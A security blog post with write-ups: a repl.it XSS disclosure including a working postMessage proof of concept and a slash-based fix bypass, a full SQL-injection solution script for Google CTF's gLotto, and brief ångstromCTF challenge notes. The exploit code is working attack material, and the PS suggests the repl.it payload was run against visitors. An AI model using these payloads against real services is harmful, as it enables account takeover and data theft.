Repl.it XSS

I recently found a rather interesting, non-traditional XSS vulnerability in repl.it. I was inspired to try this after reading a writeup for Pastetastic from Google CTF 2019, which showed off some really cool cross-origin stuff with iframes.

In case you’re not familiar with repl.it, it’s basically an online IDE with tons of features, including website hosting. Each program you make runs in its own environment called a “repl” (it’s a lot more than just a read-eval-print loop).

While messing around with how different features worked, I discovered that repls for static sites (HTML, CSS, JS) were previewed in a few nested iframes. Specifically, the site preview consisted of an iframe of https://replbox.repl.it/public/secure/, which contained a blank iframe manipulated by its parent, which was modified to contain an iframe pointing to the URL where the static files are hosted:

https://replbox.repl.it/data/web_hosting_1/<username>/<repl_name>/

I’m actually going to take a little detour and look at something interesting with the sandboxing of that iframe:

sandbox="allow-forms allow-pointer-lock allow-popups allow-same-origin allow-scripts allow-modals"

If this was done correctly, it would prevent the iframe containing user content from messing with the top window’s location since the allow-top-navigation option is not set. However, the allow-same-origin attribute means it is not sandboxed from accessing windows that are also on replbox.repl.it, and it just so happens the parent two levels up (the ironically named /public/secure page) is both on the same origin and not sandboxed. This means the location of the top window, repl.it, can be modified with something like:

window.parent.parent.eval("top.location.href = 'https://kmh.zone'")

An arbitrary redirect isn’t a particularly high severity vulnerability, but it obviously goes against the intent of the authors of the code, and shows that cross-origin frame stuff is very weird.

Now let’s start looking at the actual XSS vulnerability. The /public/secure page imports a script, runner.js. After some variable renaming and refactoring, the important part of the code looks like this:

var listeners = { load: s, evaljs: a, html: i };
var secret;
window.addEventListener("message", function(event) {
  var req = JSON.parse(event.data);
  if (req.secret) {
    if (secret || "handshake" !== req.type) {
      if (req.secret !== secret) return;
      if (!listeners[req.type])
        throw Error("No listeners for event:" + req.type);
      listeners[req.type](req.data);
    } else secret = req.secret;
  }
})

There’s a pretty glaring issue here: the message handler doesn’t check the origin. This means we can stick this in an iframe in our own site and send any messages we want, including evaljs (which, per its name, evaluates JavaScript).
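To make the flaw concrete, here is a minimal Python model of the handler's state machine. It is a sketch, not repl.it's code: `Runner`, `handle`, `allowed_origins`, and the attacker origin are names invented for illustration. It shows that whoever sends the first handshake chooses the secret, and that an origin allowlist (the check missing from runner.js) would drop the attacker's messages.

```python
import json

class Runner:
    """Toy model of the message handler in runner.js (hypothetical names)."""

    def __init__(self, allowed_origins=None):
        self.secret = None
        self.allowed_origins = allowed_origins  # None models the vulnerable handler
        self.evaluated = []  # records evaljs payloads instead of running them

    def handle(self, origin, raw):
        # The missing check: drop messages from origins we do not trust.
        if self.allowed_origins is not None and origin not in self.allowed_origins:
            return
        req = json.loads(raw)
        if not req.get("secret"):
            return
        if self.secret is None and req.get("type") == "handshake":
            self.secret = req["secret"]  # the first sender picks the secret
            return
        if req["secret"] != self.secret:
            return
        if req.get("type") == "evaljs":
            self.evaluated.append(req.get("data"))

def attack(runner):
    for msg in ({"secret": "asdf", "type": "handshake"},
                {"secret": "asdf", "type": "evaljs", "data": "createRepl()"}):
        runner.handle("https://attacker.example", json.dumps(msg))
    return runner.evaluated

vulnerable = attack(Runner())
patched = attack(Runner(allowed_origins={"https://repl.it"}))
print(vulnerable, patched)
```

In the model, the shared secret adds nothing when the attacker is the one performing the handshake; only the origin check separates the two runs.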

So this gives us full code execution on replbox.repl.it. The thing is that this is kind of useless; there is a session cookie on that domain, but I couldn’t see anything it authenticated for. I messed around for a while trying to find stuff like a path I could host a service worker on, but all the user controlled content was under directories based on username and repl name.

As I continued to mess around, I started to notice the similarities between the API on repl.it and replbox.repl.it: they both had /data routes, they both had /public routes, and the 404 pages were the same. Eventually I realized that if I set my session cookie to be the same on replbox.repl.it as repl.it, I could access the authenticated API routes. Then I had an idea — what if there was /public/secure/ on repl.it? And lo and behold, there it was! I had arbitrary JavaScript execution on the main domain. I quickly wrote up a proof of concept that created a repl as the currently signed in user:

<iframe style="position:absolute;left:-100000px;" id="repl" src="https://repl.it/public/secure"></iframe>
<script>
function createRepl(){
  var xhr = new XMLHttpRequest();
  xhr.open("POST", 'https://repl.it/data/repls/new');
  xhr.setRequestHeader("Content-Type", "application/json");
  xhr.send(JSON.stringify({language: "python3", title: "kmh was here " + Math.floor(Math.random()*1000000), folderId: "", isPrivate: false, description: ""}));
}
setTimeout(function() {
  repl.contentWindow.postMessage(JSON.stringify({secret: "asdf", type: "handshake"}), "*");
  setTimeout(function() {
    repl.contentWindow.postMessage(JSON.stringify({secret: "asdf", type: "load"}), "*");
    setTimeout(function() {
      repl.contentWindow.postMessage(JSON.stringify({secret: "asdf", type: "evaljs", data: createRepl.toString()+";createRepl()"}), "*");
    }, 200);
  }, 200);
}, 200);
</script>

I contacted the repl.it team on Discord, and after waiting a bit, I got a reply and it was forwarded over to the engineering team. Now, according to their security page, they “work with you to fix the issue and then we will credit you on our blog.” After the initial report, they gave me a year-long free “hacker” plan, and I didn’t hear from them again.

I noticed a bit later that they pushed a “fix” to the issue by redirecting from

https://repl.it/public/secure/

to

https://replbox.repl.it/public/secure/

However, in my toolkit of random things that sometimes work, I had a trick that was the intended solution for a problem I wrote for ångstromCTF 2019: there are often inconsistencies in how having multiple slashes in a URL is handled. Some web servers collapse them, some don’t.

In this case, it seems like however they are matching the redirect does not collapse multiple slashes, but the way they are serving the files does. This means that you can go to https://repl.it/public//secure/ and still get full code execution on the repl.it domain. Since they never contacted me to verify whether it was fixed, I had no way or reason to let them know. Oh well.
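The mismatch can be sketched in a few lines of Python. This is only a model of the behavior described above, not the actual server logic: `redirect_matches` and `file_served` are hypothetical stand-ins for a redirect rule that compares the raw path and a file handler that collapses repeated slashes.

```python
import re

REDIRECT_FROM = "/public/secure/"  # assumed exact-match redirect rule

def redirect_matches(path):
    # Models a redirect rule that compares the raw path without normalizing it.
    return path == REDIRECT_FROM

def file_served(path):
    # Models a static file handler that collapses repeated slashes first.
    return re.sub(r"/{2,}", "/", path)

for path in ("/public/secure/", "/public//secure/"):
    print(path, redirect_matches(path), file_served(path))
```

The second path slips past the redirect check yet still resolves to the same file, which is the gap the bypass relies on.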

PS: If you’re currently logged in to repl.it, check out your repls ;)

Update: repl.it has fixed the redirect bypass and is working on a couple other XSS and CSRF issues I reported.

Google CTF 2019

I played Google CTF as a part of the team pearl this past weekend. We did okay, placing 50th (obviously not a high school CTF). I solved one web challenge that I really liked — gLotto.

gLotto

22 solves, 288 points

Are you lucky?

https://glotto.web.ctfcompetition.com/

Analysis

The link goes to a “lottery” website, with tables of past winning tickets and an option to check your ticket. At the bottom of the page, there is a link to show the source.

We can see that the flag is given if you submit the winning ticket:

if ($_POST['code'] === $win)
{
    die("You won! $flag");
} else {
    sleep(5);
    die("You didn't win :(<br>The winning ticket was $win");
}

Additionally, a new winning ticket is randomly generated on every request to the home page, and the winning ticket is unset on checking a ticket, preventing you from just submitting the winning ticket without visiting the home page again.

The application also lets you sort each table by a key in a query parameter:

for ($i = 0; $i < count($tables); $i++)
{
    $order = isset($_GET["order{$i}"]) ? $_GET["order{$i}"] : '';
    if (stripos($order, 'benchmark') !== false) die;
    ${"result$i"} = $db->query("SELECT * FROM {$tables[$i]} " . ($order != '' ? "ORDER BY `".$db->escape_string($order)."`" : ""));
    if (!${"result$i"}) die;
}

The documentation for mysqli::escape_string lists the characters encoded:

Characters encoded are NUL (ASCII 0), \n, \r, \, ', ", and Control-Z.

Notice that backticks are not on this list, so "ORDER BY `".$db->escape_string($order)."`" is vulnerable to SQL injection. Here is a very basic proof that this works:

https://glotto.web.ctfcompetition.com/?order0=winner`%20--%20

This URL sorts the March table by the winner column, since it results in the following query:

SELECT * FROM march ORDER BY `winner` -- `

The -- comments out the extra backtick to prevent a syntax error.
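As a rough illustration of why the escaping does not help, the following Python sketch models the query construction. `escape_string` here is a simplified stand-in written for this example (it only mimics the character list quoted above), and `build_query` is a hypothetical helper mirroring the PHP string concatenation.

```python
def escape_string(s):
    # Rough model of the escaping described above: backslash-escape
    # NUL, \n, \r, \, ', " and Control-Z. Backticks pass through untouched.
    table = {"\0": "\\0", "\n": "\\n", "\r": "\\r", "\\": "\\\\",
             "'": "\\'", '"': '\\"', "\x1a": "\\Z"}
    return "".join(table.get(ch, ch) for ch in s)

def build_query(table_name, order):
    # Mirrors the PHP: the escaped value is wrapped in backticks.
    return f"SELECT * FROM {table_name} ORDER BY `{escape_string(order)}`"

print(build_query("march", "winner"))
print(build_query("march", "winner` -- "))
```

The second call closes the identifier early, so everything after the backtick is interpreted as SQL rather than as part of the column name.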

At this point, it’s also important to note that the winning ticket is assigned to an SQL variable that is never used again:

$db->query("SET @lotto = '$winner'");

Interesting…

So, what can we do with the SQL injection? Well, the answer turns out to be “not much.” The MySQL documentation shows the valid syntax for a SELECT statement:

SELECT
    [ALL | DISTINCT | DISTINCTROW ]
      [HIGH_PRIORITY]
      [STRAIGHT_JOIN]
      [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
      [SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
    select_expr [, select_expr ...]
    [FROM table_references
      [PARTITION partition_list]
    [WHERE where_condition]
    [GROUP BY {col_name | expr | position}, ... [WITH ROLLUP]]
    [HAVING where_condition]
    [WINDOW window_name AS (window_spec)
        [, window_name AS (window_spec)] ...]
    [ORDER BY {col_name | expr | position}
      [ASC | DESC], ... [WITH ROLLUP]]
    [LIMIT {[offset,] row_count | row_count OFFSET offset}]
    [INTO OUTFILE 'file_name'
        [CHARACTER SET charset_name]
        export_options
      | INTO DUMPFILE 'file_name'
      | INTO var_name [, var_name]]
    [FOR {UPDATE | SHARE} [OF tbl_name [, tbl_name] ...] [NOWAIT | SKIP LOCKED] 
      | LOCK IN SHARE MODE]]

Our injection is after ORDER BY, so the only fields we control are ORDER BY, LIMIT, INTO, and FOR. INTO and FOR are both pretty much useless for conveying information. LIMIT cannot be an expression, so it can’t be used for sending data. That leaves the ORDER BY clause.

Since we have to specify a valid column for the first ORDER BY, and each column has unique values, it seems like we won’t be able to control the ordering. However, we can add on to the expression to make it always return the same value and force it to use the secondary sort column. I chose to use IS NOT NULL. With this, we can sort by an arbitrary value. Let’s try just sorting randomly:

https://glotto.web.ctfcompetition.com/?order0=winner`%20IS%20NOT%20NULL,%20RAND()%20--%20

This gives the following query:

SELECT * FROM march ORDER BY `winner` IS NOT NULL, RAND() -- `

As expected, the March table is ordered differently each time we visit the page.
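The same tie-then-secondary-key idea can be shown with Python's `sorted`. This is only an analogy to the SQL behavior: the four tickets are taken from the March table, while the `secondary` values are made up for the example.

```python
rows = ["CA5G8VIB6UC9", "01VJNN9RHJAC", "1WSNL48OLSAJ", "UN683EI26G56"]

# Hypothetical secondary key: any value we can compute per row.
secondary = {"CA5G8VIB6UC9": 2, "01VJNN9RHJAC": 0,
             "1WSNL48OLSAJ": 3, "UN683EI26G56": 1}

# `winner IS NOT NULL` is true for every row, so the first key always ties
# and the second key alone decides the order.
ordered = sorted(rows, key=lambda w: (w is not None, secondary[w]))
print(ordered)
```

Replacing `RAND()` with an expression we choose therefore gives full control over the row order.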

Exploitation

So we have complete control over the ordering. Is this enough to transmit the entire winning ticket? Let’s look at the gen_winner function:

function gen_winner($count, $charset='0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ')
{
    $len = strlen($charset);
    $rand = openssl_random_pseudo_bytes($count);
    $secret = '';

    for ($i = 0; $i < $count; $i++)
    {
        $secret .= $charset[ord($rand[$i]) % $len];
    }
    return $secret;
}

And how it is called:

$winner = gen_winner(12);

This is essentially a 12 digit base36 number, so there are 36**12 possible tickets:

>>> 36**12
4738381338321616896

We are able to sort 4 different tables, of lengths 9, 8, 7, and 4. If we make the meaning of the ordering of each table depend on the ordering of the previous tables, we can calculate the number of possible “messages”:

>>> fac(9)*fac(8)*fac(7)*fac(4)
1769804660736000

This means we can narrow it down to about 2,677 possible tickets:

>>> 4738381338321616896/1769804660736000
2677.3470787172014

Since there is a sleep(5) when checking a ticket, each check takes a little over 5 seconds. If we parallelize our solution script, it is definitely possible to brute force ~2.7k in a reasonable amount of time (i.e. less than an hour).
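A back-of-the-envelope version of that estimate, as a sketch: the worker count and the assumption that a run needs about as many attempts as there are candidates are mine, not measured values.

```python
from math import factorial as fac

tickets = 36 ** 12
messages = fac(9) * fac(8) * fac(7) * fac(4)
candidates = -(-tickets // messages)  # ceiling division

# Assumptions for the estimate: 10 workers, about 5 seconds per check,
# and on average `candidates` attempts before a guess lands.
workers = 10
seconds_per_check = 5
expected_minutes = candidates * seconds_per_check / workers / 60

print(messages, candidates, round(expected_minutes, 1))
```

Under those assumptions the expected run time comes out at a bit over 20 minutes, comfortably inside the one-hour budget.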

Encoding

We need to figure out how to encode information in the tables. A table of size n has n! permutations, so it can encode n! numbers based on ordering.

Let the default ordering of the table be order[0, 1, 2, ... n-1]. In order to encode a number x within the interval [0, n!), first divide the interval into n subintervals: [0, (n-1)!), [(n-1)!, 2*(n-1)!), ..., [(n-1)*(n-1)!, n*(n-1)!). If x lies within subinterval i, the new ordering begins with order[i]. Repeat within that subinterval, this time dividing into n-1 subintervals. Of course, order[i] must be removed since it was already used; n-1 elements remain.

Python implementations of encoding and decoding are given below:

def encode(x, n):
  rows = list(range(n))
  order = []
  for i in range(n-1, -1, -1):
    order.append(rows.pop(x//fac(i)))
    x %= fac(i)
  return tuple(order)

def decode(order, n):
  order = list(order)
  rows = list(range(n))
  x = 0
  for i in range(n-1, -1, -1):
    j = rows.index(order.pop(0))
    x += j*fac(i)
    rows.pop(j)
  return x
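A quick round-trip check of the scheme, as a sketch. The two functions are restated compactly so the snippet runs on its own; `decode` walks the order with `zip` instead of popping, which is a cosmetic change only.

```python
from math import factorial as fac

def encode(x, n):
    rows, order = list(range(n)), []
    for i in range(n - 1, -1, -1):
        order.append(rows.pop(x // fac(i)))
        x %= fac(i)
    return tuple(order)

def decode(order, n):
    rows, x = list(range(n)), 0
    for i, row in zip(range(n - 1, -1, -1), order):
        j = rows.index(row)
        x += j * fac(i)
        rows.pop(j)
    return x

n = 4
orders = [encode(x, n) for x in range(fac(n))]
print(encode(17, n))
```

For n = 4, every number in [0, 24) maps to a distinct permutation and decodes back to itself, so no capacity is wasted.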

The encoding function needs to be implemented in SQL. This seems hard at first since it uses a mutable array and pops indices from it, and we can only use simple SQL expressions. While it may be possible to generate a bunch of CASE statements that give a single expression for transposing each position, it would also be incredibly long, and the web server has limits on how long the query string can be (which we encounter a little bit later).

However, a couple observations make this conversion a little bit easier:

  1. Subqueries can be used to make “variables”
  2. MySQL has support for a JSON data type

To do incremental calculations that reuse previous ones, we can stack subqueries like so:

(SELECT c+1 as d FROM (SELECT b+1 as c FROM (SELECT a+1 as b FROM...

The important thing is that this allows us to reuse a previous calculation in multiple future calculations without retyping the entire expression. Another thing to note here is that we don’t have any variables/state, just composition of functions (subqueries). This might remind you a little bit of lambda calculus.
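The stacking pattern can be tried locally with Python's built-in sqlite3 module. SQLite stands in for MySQL here purely for convenience (an assumption of this sketch); the aliases `t1` to `t3` are arbitrary.

```python
import sqlite3

# SQLite stands in for MySQL here; the nesting pattern is the same.
conn = sqlite3.connect(":memory:")
row = conn.execute(
    "SELECT a, b, c, c + 1 AS d FROM "
    "(SELECT a, b, b + 1 AS c FROM "
    "(SELECT a, a + 1 AS b FROM "
    "(SELECT 1 AS a) AS t3) AS t2) AS t1"
).fetchone()
print(row)
```

Each layer can read every column exposed by the layer beneath it, which is what lets an intermediate result be reused without repeating its expression.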

In the Python implementation of encode, there are basically three pieces of state: rows, order, and x. rows is the remaining rows that have not been transposed. order is the output of the function (the map for transposition). x is the number to encode, modded by the interval size at each step. MySQL’s JSON type can represent arrays, so that will be used for rows and order.

When sending a request to the server, the table sizes are predetermined, so anything depending on that can be hardcoded into the SQL query. We will implement a Python function that generates an SQL query to reorder a table of size n such that it extracts a number represented by the expression expr. The conditions that represent the original row order will be given in the array m:

def sqlencode(expr, n, m):

The initial state of the encoding can be set with the following subquery (curly braces are used for formatting the string):

(SELECT {expr} as s{n}, JSON_ARRAY({','.join(str(i) for i in range(n))}) as r{n}, JSON_ARRAY(0) as o{n}, CONCAT(CHAR(36), CHAR(91), CHAR(65), CHAR(93)) as h) AS t{n}

x is represented by s{n}, rows is represented by r{n}, and order is represented by o{n}. The JSON_ARRAY is initialized with a single element because on my local version of MariaDB, it turned into an empty string otherwise. It is not required against the server. h is a helper string, '$[A]', that allows for a REPLACE to be used instead of reconstructing the entire JSON identifier each time. Without this optimization, the query ends up being too long and the web server rejects it. CONCAT and CHAR are used since single and double quotes are escaped in the PHP before being put in the query.

Subqueries are then added to the outside for each iteration of the loop in the Python implementation. These are of the format:

(SELECT h, JSON_ARRAY_APPEND(o{i+1}, CONVERT(CHAR(36) USING utf8mb4), JSON_EXTRACT(r{i+1}, REPLACE(h,CHAR(65), CONVERT(s{i+1} DIV {fac(i)},char)))) as o{i},  MOD(s{i+1}, {fac(i)}) as s{i}, JSON_REMOVE(r{i+1}, REPLACE(h, CHAR(65), CONVERT(s{i+1} DIV {fac(i)},char))) AS r{i} FROM {subquery}) AS t{i}

h is selected so it can be used in the next query as well. JSON_ARRAY_APPEND is used to add the element at index floor(x/(i!)) of rows to order. CHAR(36) is just $, which signifies the entire JSON array. It needs to be converted to utf8mb4 because JSON_ARRAY_APPEND rejects binary encoding. x is calculated as the previous x mod i!, and rows has the element at index floor(x/(i!)) removed. REPLACE is used to replace the A in $[A] with the proper index.
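What one of these subqueries computes can be mirrored on plain Python lists. This is a sketch for intuition only: `json_path` and `step` are hypothetical helpers that imitate the REPLACE trick and a single iteration, not code that runs against the server.

```python
# CHAR(36), CHAR(91), CHAR(65), CHAR(93) spell out the helper without quotes.
h = "".join(chr(c) for c in (36, 91, 65, 93))

def json_path(index):
    # Mirrors REPLACE(h, CHAR(65), CONVERT(index, char)) in the query.
    return h.replace(chr(65), str(index))

def step(s, r, o, f):
    # One loop iteration on plain Python lists: append r[s DIV f] to o,
    # remove it from r, and keep s MOD f for the next iteration.
    idx = s // f
    return s % f, r[:idx] + r[idx + 1:], o + [r[idx]]

print(h, json_path(3), step(17, [0, 1, 2, 3], [0], 6))
```

The output list starts with the placeholder 0, matching the JSON_ARRAY(0) initialization, so the real entries begin at index 1.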

Now that the output array is calculated, the rows need to be sorted correctly. A CASE statement is constructed based on the array of conditions, m, to order the rows, and a final query is constructed. The full function can be seen below:

def sqlencode(expr, n, m):
  query = f"(SELECT {expr} as s{n},JSON_ARRAY({','.join(str(i)for i in range(n))}) as r{n},JSON_ARRAY(0) as o{n},CONCAT(CHAR(36),CHAR(91),CHAR(65),CHAR(93)) as h) AS t{n}"
  for i in range(n-1, -1, -1):
    query = f"(SELECT h,JSON_ARRAY_APPEND(o{i+1}, CONVERT(CHAR(36) USING utf8mb4), JSON_EXTRACT(r{i+1},REPLACE(h,CHAR(65),CONVERT(s{i+1} DIV {fac(i)},char)))) as o{i}, MOD(s{i+1}, {fac(i)}) as s{i}, JSON_REMOVE(r{i+1}, REPLACE(h,CHAR(65),CONVERT(s{i+1} DIV {fac(i)},char))) AS r{i} FROM " + query + f") AS t{i}"
  jsonquery = "JSON_EXTRACT(o0,CONCAT(CHAR(36),CHAR(91),CONVERT({index},char),CHAR(93)))"
  cases = "CASE"
  for i in range(len(m)):
    cases += f" WHEN {m[i]} THEN {jsonquery.format(index=i+1)}"
  cases += " ELSE NULL END"
  query = "(SELECT " + cases + " FROM " + query + ")"
  return query

To decode a number retrieved from the server, we figure out which row was moved where and plug an array of that into the decode function:

def sqldecode(r, n, m):
  s = sorted(list(map(lambda x:(r.index(x), x), m)), key=lambda x:x[0])
  encoded = []
  for t in m:
    encoded.append([i[1] for i in s].index(t))
  encoded = tuple(encoded)
  return decode(encoded, n)

r is the server response, n is the number of rows, and m is an array of the tickets in their original order.

Exfiltration

We can now transmit 4 numbers in the ranges [0,8!), [0,9!), [0,7!), and [0,4!), one per table in query order. To get the possibilities for the winning lottery ticket, we convert it to a base36 number and use each table to get a range of possible values.

We want to divide the number so that it fits in the range of the first table, [0,8!). The maximum value is 36**12 - 1 (ZZZZZZZZZZZZ), so we take that and divide it by 8!:

>>> ceil((36**12 - 1)/fac(8))
117519378430596

Our first piece of data we get is which interval of size 117519378430596 the winning ticket lies in. We then take the winning number modulo 117519378430596, and split that into intervals that give indices up to the size of our next table, 9!. This process is repeated for each table until we narrow it down to 2,677 values and guess one of them.
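The interval splitting can be checked offline with a short sketch. The helper names `ceil_div` and `split` are mine, and the sample ticket is just one of the past winners from the March table used as test input; integer ceiling division is used to avoid floating-point rounding on numbers this large.

```python
from math import factorial as fac

def ceil_div(a, b):
    return -(-a // b)

# Each divisor is the interval width for one table, in the order the
# tables are queried (8, 9, 7, and 4 rows).
d1 = ceil_div(36 ** 12 - 1, fac(8))
d2 = ceil_div(d1, fac(9))
d3 = ceil_div(d2, fac(7))
d4 = ceil_div(d3, fac(4))

def split(ticket):
    r1, rest = divmod(ticket, d1)
    r2, rest = divmod(rest, d2)
    r3, rest = divmod(rest, d3)
    r4, rest = divmod(rest, d4)
    return (r1, r2, r3, r4), rest  # rest is the part we cannot transmit

ticket = int("CA5G8VIB6UC9", 36)  # a past winner, used only as sample input
digits, rest = split(ticket)
base = d1 * digits[0] + d2 * digits[1] + d3 * digits[2] + d4 * digits[3]
print((d1, d2, d3, d4), digits, ticket - base == rest)
```

The four transmitted values pin the ticket down to a window of `d4` consecutive numbers starting at `base`; the remaining offset inside that window is what has to be guessed.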

A couple helper functions are defined to construct the queries and URL parameters:

param = lambda q: f"winner` IS NOT NULL, {q} -- "
num = lambda m1,m2,m3,d: f"(MOD(MOD(MOD(CAST(CONV(@lotto, 36, 10) AS UNSIGNED), {m1}),{m2}),{m3}) DIV {d})"

And we make a guess and hopefully get the flag:

rs = requests.session()
r = rs.get(url, params={
    "order0": param(sqlencode(num(36**12, 36**12, 36**12, 117519378430596), 8, march)),
    "order1": param(sqlencode(num(36**12, 36**12, 117519378430596, 323851903), 9, april)),
    "order2": param(sqlencode(num(36**12, 117519378430596, 323851903, 64257), 7, may)),
    "order3": param(sqlencode(num(117519378430596, 323851903, 64257, 2678), 4, june))
})
r1 = sqldecode(r.text, 8, marcht)
r2 = sqldecode(r.text, 9, aprilt)
r3 = sqldecode(r.text, 7, mayt)
r4 = sqldecode(r.text, 4, junet)
guess = 117519378430596*r1 + 323851903*r2 + 64257*r3 + 2678*r4 + 100
r = rs.post(url, data={"code":base36encode(guess).zfill(12)})
if "CTF" in r.text:
    print(r.text)

The full solution script:

from math import factorial as fac

def base36encode(integer):
    chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
    
    sign = '-' if integer < 0 else ''
    integer = abs(integer)
    result = ''
    
    while integer > 0:
        integer, remainder = divmod(integer, 36)
        result = chars[remainder]+result

    return sign+result

def encode(x, n):
  rows = list(range(n))
  order = []

  for i in range(n-1, -1, -1):
    order.append(rows.pop(x//fac(i)))
    x %= fac(i)
  return tuple(order)

def decode(order, n):
  order = list(order)
  rows = list(range(n))
  x = 0
  for i in range(n-1, -1, -1):
    j = rows.index(order.pop(0))
    x += j*fac(i)
    rows.pop(j)
  return x

def sqlencode(expr, n, m):
  query = f"(SELECT {expr} as s{n},JSON_ARRAY({','.join(str(i)for i in range(n))}) as r{n},JSON_ARRAY(0) as o{n},CONCAT(CHAR(36),CHAR(91),CHAR(65),CHAR(93)) as h) AS t{n}"
  for i in range(n-1, -1, -1):
    query = f"(SELECT h,JSON_ARRAY_APPEND(o{i+1}, CONVERT(CHAR(36) USING utf8mb4), JSON_EXTRACT(r{i+1},REPLACE(h,CHAR(65),CONVERT(s{i+1} DIV {fac(i)},char)))) as o{i}, MOD(s{i+1}, {fac(i)}) as s{i}, JSON_REMOVE(r{i+1}, REPLACE(h,CHAR(65),CONVERT(s{i+1} DIV {fac(i)},char))) AS r{i} FROM " + query + f") AS t{i}"
  jsonquery = "JSON_EXTRACT(o0,CONCAT(CHAR(36),CHAR(91),CONVERT({index},char),CHAR(93)))"
  cases = "CASE"
  for i in range(len(m)):
    cases += f" WHEN {m[i]} THEN {jsonquery.format(index=i+1)}"
  cases += " ELSE NULL END"
  query = "(SELECT " + cases + " FROM " + query + ")"
  return query

def sqldecode(r, n, m):
  s = sorted(list(map(lambda x:(r.index(x), x), m)), key=lambda x:x[0])
  encoded = []
  for t in m:
    encoded.append([i[1] for i in s].index(t))
  encoded = tuple(encoded)
  return decode(encoded, n)

march = ["INSTR(winner,CHAR("+str(ord("C"))+"))=1",
         "INSTR(winner,CHAR("+str(ord("1"))+"))=2",
         "INSTR(winner,CHAR("+str(ord("1"))+"))=1",
         "INSTR(winner,CHAR("+str(ord("U"))+"))=1",
         "INSTR(winner,CHAR("+str(ord("Y"))+"))=1",
         "INSTR(winner,CHAR("+str(ord("H"))+"))=3",
         "INSTR(winner,CHAR("+str(ord("D"))+"))=1",
         "INSTR(winner,CHAR("+str(ord("I"))+"))=1"]
marcht = ["CA5G8VIB6UC9", "01VJNN9RHJAC", "1WSNL48OLSAJ", "UN683EI26G56", "YYKCXJKAK3KV", "00HE2T21U15H", "D5VBHEDB9YGF", "I6I8UV5Q64L0"]

april = ["INSTR(winner,CHAR("+str(ord("4"))+"))=1",
         "INSTR(winner,CHAR("+str(ord("7"))+"))=1",
         "INSTR(winner,CHAR("+str(ord("U"))+"))=1",
         "INSTR(winner,CHAR("+str(ord("O"))+"))=1",
         "INSTR(winner,CHAR("+str(ord("2"))+"))=1",
         "INSTR(winner,CHAR("+str(ord("L"))+"))=1",
         "INSTR(winner,CHAR("+str(ord("8"))+"))=1",
         "INSTR(winner,CHAR("+str(ord("B"))+"))=1",
         "INSTR(winner,CHAR("+str(ord("3"))+"))=1"]
aprilt = ["4KYEC00RC5BZ", "7AET1KPGKUG4", "UDT5LEWRSWM9", "OQQRH90KDJH1", "2JTBMJW9HZOO", "L4CY1JMRBEAW", "8DKYRPIO4QUW", "BFWQCWYK9VHJ", "31OSKU57KV49"]

may = ["INSTR(winner,CHAR("+str(ord("3"))+"))=2",
       "INSTR(winner,CHAR("+str(ord("P"))+"))=1",
       "INSTR(winner,CHAR("+str(ord("W"))+"))=2",
       "INSTR(winner,CHAR("+str(ord("M"))+"))=2",
       "INSTR(winner,CHAR("+str(ord("K"))+"))=1",
       "INSTR(winner,CHAR("+str(ord("Z"))+"))=1",
       "INSTR(winner,CHAR("+str(ord("8"))+"))=1"]
mayt = ["O3QZ2P6JNSSA", "PQ8ZW6TI1JH7", "OWGVFW0XPLHE", "OMZRJWA7WWBC", "KRRNDWFFIB08", "ZJR7ANXVBLEF", "8GAB09Z4Q88A"]

june = ["INSTR(winner,CHAR("+str(ord("1"))+"))=1",
        "INSTR(winner,CHAR("+str(ord("Y"))+"))=1",
        "INSTR(winner,CHAR("+str(ord("W"))+"))=1",
        "INSTR(winner,CHAR("+str(ord("G"))+"))=1"]
junet = ["1JJL716ATSCZ", "YELDF36F4TW7", "WXRJP8D4KKJQ", "G0O9L3XPS3IR"]

param = lambda q: f"winner` IS NOT NULL, {q} -- "
num = lambda m1,m2,m3,d: f"(MOD(MOD(MOD(CAST(CONV(@lotto, 36, 10) AS UNSIGNED), {m1}),{m2}),{m3}) DIV {d})"

import requests
url = "https://glotto.web.ctfcompetition.com"

while True:
  rs = requests.session()
  r = rs.get(url, params={
    "order0": param(sqlencode(num(36**12, 36**12, 36**12, 117519378430596), 8, march)),
    "order1": param(sqlencode(num(36**12, 36**12, 117519378430596, 323851903), 9, april)),
    "order2": param(sqlencode(num(36**12, 117519378430596, 323851903, 64257), 7, may)),
    "order3": param(sqlencode(num(117519378430596, 323851903, 64257, 2678), 4, june))
  })
  r1 = sqldecode(r.text, 8, marcht)
  r2 = sqldecode(r.text, 9, aprilt)
  r3 = sqldecode(r.text, 7, mayt)
  r4 = sqldecode(r.text, 4, junet)
  guess = 117519378430596*r1 + 323851903*r2 + 64257*r3 + 2678*r4 + 100
  r = rs.post(url, data={"code":base36encode(guess).zfill(12)})
  if "CTF" in r.text:
    print(r.text)
    break
  win = int(r.text.split(" ")[-1], 36)
  print(guess - win, r.text.split(" ")[-1], base36encode(guess).zfill(12))

And the code used to parallelize it:

import os, sys

for i in range(10):
  os.system("python3 lotto.py &")

while True:
  try:
    pass
  except BaseException:
    os.system("pkill -f lotto.py")
    sys.exit(0)

After running this for a bit, the flag pops out:

CTF{3c2ca0d10a5d4bf44bc716d669e074b2}

ångstromCTF 2019

This was my second year organizing ångstromCTF. Compared to last year, I wrote a lot more challenges and did a lot more work on the platform. Despite some site stability issues, we still ended up with over 1,300 scoring teams. Here are the challenges I wrote (this is going to be a long post):

Aquarium

This challenge is a relatively basic buffer overflow. You have a win function, so you use the unbounded input in gets to overflow the buffer until the return address is overwritten with the address of the win function.

Plenty of tutorials online (and hopefully community created writeups for this challenge) will go into more detail about how to do this.
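For orientation, the general shape of such a payload looks like the sketch below. Both constants are placeholders invented for this example, not values from the challenge binary, and a 64-bit little-endian target is assumed; the real offset and address have to be read out of the binary with a disassembler and a debugger.

```python
import struct

# Both values are placeholders, not taken from the challenge binary:
# find the real ones with a disassembler and a debugger.
OFFSET_TO_RETURN_ADDRESS = 72      # hypothetical padding length
WIN_ADDRESS = 0x4011B6             # hypothetical address of the win function

def build_payload(offset, address):
    # Padding up to the saved return address, then the new address
    # packed as a little-endian 64-bit value.
    return b"A" * offset + struct.pack("<Q", address)

payload = build_payload(OFFSET_TO_RETURN_ADDRESS, WIN_ADDRESS)
print(payload)
```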

Pie Shop

This is a partial overwrite challenge. You are unable to control the null byte at the end of your input and you have 4 bits that are random in the bottom 2 bytes, so you have to overwrite the lower 3 bytes of the address and just keep trying until you get lucky and return to the win function.

Returns

This is a format string challenge.

